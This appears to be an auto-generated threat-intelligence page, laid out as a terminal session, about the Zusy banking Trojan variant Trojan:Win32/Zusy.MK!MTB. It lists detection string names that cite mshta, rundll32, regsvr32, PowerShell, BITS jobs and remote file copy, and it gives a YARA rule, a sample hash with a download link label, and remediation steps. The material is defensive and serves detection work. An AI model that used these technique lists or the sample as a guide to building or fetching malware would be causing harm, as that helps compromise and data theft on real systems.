user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:Win32/Zusy.MK!MTB
Trojan:Win32/Zusy.MK!MTB - Windows Defender threat signature analysis

Trojan:Win32/Zusy.MK!MTB - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Zusy.MK!MTB
Classification:
Type:Trojan
Platform:Win32
Family:Zusy
Detection Type:Concrete
Known malware family with identified signatures
Variant:MK
Specific signature variant within the malware family
Suffix:!MTB
Detected via machine learning and behavioral analysis
Detection Method:Behavioral
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Zusy

Summary:

This is a concrete detection of Trojan:Win32/Zusy.MK!MTB, a sophisticated variant of the Zusy banking Trojan. It leverages machine learning behavioral analysis to identify its use of advanced techniques like API hooking, abuse of legitimate Windows binaries (mshta, rundll32, regsvr32), PowerShell, BITS, and scheduled tasks for persistence, evasion, data exfiltration, and system compromise.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - .rsrc (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
YARA Rule:
rule Trojan_Win32_Zusy_MK_2147951922_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Trojan:Win32/Zusy.MK!MTB"
        threat_id = "2147951922"
        type = "Trojan"
        platform = "Win32: Windows 32-bit platform"
        family = "Zusy"
        severity = "Critical"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
        threshold = "30"
        strings_accuracy = "Low"
    strings:
        $x_10_1 = {40 00 00 e0 2e 72 73 72 63 00 00 00 ?? ?? ?? 00 00 40 0d 00 00}  //weight: 10, accuracy: Low
        $x_10_2 = {40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 ?? ?? 00 00 02 00 00}  //weight: 10, accuracy: Low
        $x_10_3 = {20 20 20 00 20 20 20 20 00 30 0d 00 00 10 00 00 00 38 06}  //weight: 10, accuracy: High
    condition:
        (filesize < 20MB) and
        (all of ($x*))
}
Known malware which is associated with this threat:
Filename: 8e0a99f71e8c0d509436a4719259cd2bdf2e6253e251ff36c1fca500cb1ee292
8e0a99f71e8c0d509436a4719259cd2bdf2e6253e251ff36c1fca500cb1ee292
08/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected system and initiate a full system scan with updated security software. Investigate for persistence mechanisms (e.g., scheduled tasks, BITS jobs), potential data exfiltration, and lateral movement. Reset all credentials used on the compromised system and restore from a known clean backup if available.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 08/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$